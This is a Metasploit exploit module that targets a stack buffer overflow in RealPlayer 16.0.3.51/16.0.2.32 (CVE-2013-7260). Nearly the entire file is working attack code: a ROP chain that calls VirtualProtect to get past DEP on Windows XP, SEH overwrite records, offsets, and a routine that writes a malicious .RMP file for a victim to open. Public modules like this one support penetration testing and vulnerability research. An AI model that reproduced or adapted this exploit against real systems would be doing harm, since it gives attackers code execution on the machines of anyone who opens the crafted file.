##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'RealNetworks RealPlayer Version Attribute Buffer Overflow',
        'Description' => %q{
          This module exploits a stack-based buffer overflow vulnerability in
          version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by
          improper bounds checking of the version and encoding attributes inside
          the XML declaration.

          By persuading the victim to open a specially-crafted .RMP file, a
          remote attacker could execute arbitrary code on the system or cause
          the application to crash.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Gabor Seljan' # Vulnerability discovery and Metasploit module
        ],
        'References' => [
          [ 'BID', '64695' ],
          [ 'EDB', '30468' ],
          [ 'OSVDB', '101356' ],
          [ 'CVE', '2013-7260' ],
          [ 'US-CERT-VU', '698278' ],
          [ 'URL', 'http://service.real.com/realplayer/security/12202013_player/en/' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Platform' => 'win',
        'Payload' => {
          'BadChars' => "\x00\x22",
          'Space' => 2396
        },
        'Targets' => [
          [
            'Windows XP SP2/SP3 (DEP Bypass) / RealPlayer 16.0.3.51/16.0.2.32',
            {
              'OffsetROP' => 44,
              'OffsetMenu' => 11052, # Open via File -> Open
              'Ret' => 0x5acceecd # ADD ESP,428 # RETN 10 [mswmdm.dll]
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2013-12-20',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.rmp'])
      ],
      self.class
    )
  end

  def exploit
    rop_nop =
      [
        0x77c1c552   # RETN (ROP NOP) [msvcrt.dll]
      ].flatten.pack('V*')

    rop_gadgets =
      [
        0x77c21d16,  # POP EAX # RETN [msvcrt.dll]
        0x77c11120,  # &VirtualProtect() [IAT msvcrt.dll]
        0x77c1bb36,  # POP EBP # RETN [msvcrt.dll]
        0x77c20497,  # skip 4 bytes [msvcrt.dll]
        0x77c2362c,  # POP EBX # RETN [msvcrt.dll]
        0x0000095c,  # 0x0000095C-> EBC
        0x5acb2caf,  # POP EDX # RETN [mswmdm.dll]
        0x00000040,  # 0x00000040-> EDX
        0x77c1f519,  # POP ECX # RETN [msvcrt.dll]
        0x77C5D305,  # &Writable location [msvcrt.dll]
        0x77c23b47,  # POP EDI # RETN [msvcrt.dll]
        0x77c47a42,  # RETN (ROP NOP) [msvcrt.dll]
        0x77c2ed13,  # POP ESI # RETN [msvcrt.dll]
        0x77c2aacc,  # JMP [EAX] [msvcrt.dll]
        0x77c12df9,  # PUSHAD # RETN [msvcrt.dll]
        0x77c35459   # PUSH ESP # RETN [msvcrt.dll]
      ].flatten.pack('V*')

    sploit = rand_text_alpha_upper(target['OffsetROP'])
    sploit << rop_nop
    sploit << make_nops(16)
    sploit << rop_gadgets
    sploit << make_nops(16)
    sploit << payload.encoded
    sploit << generate_seh_record(target.ret) # Open via double click (2540)
    sploit << rand_text_alpha_upper(target['OffsetMenu'])
    sploit << generate_seh_record(target.ret) # Open via File -> Open (13600)
    sploit << rand_text_alpha_upper(17000) # Generate exception

    # Create the file
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create("<?xml version=\"" + sploit + "\"?>")
  end
end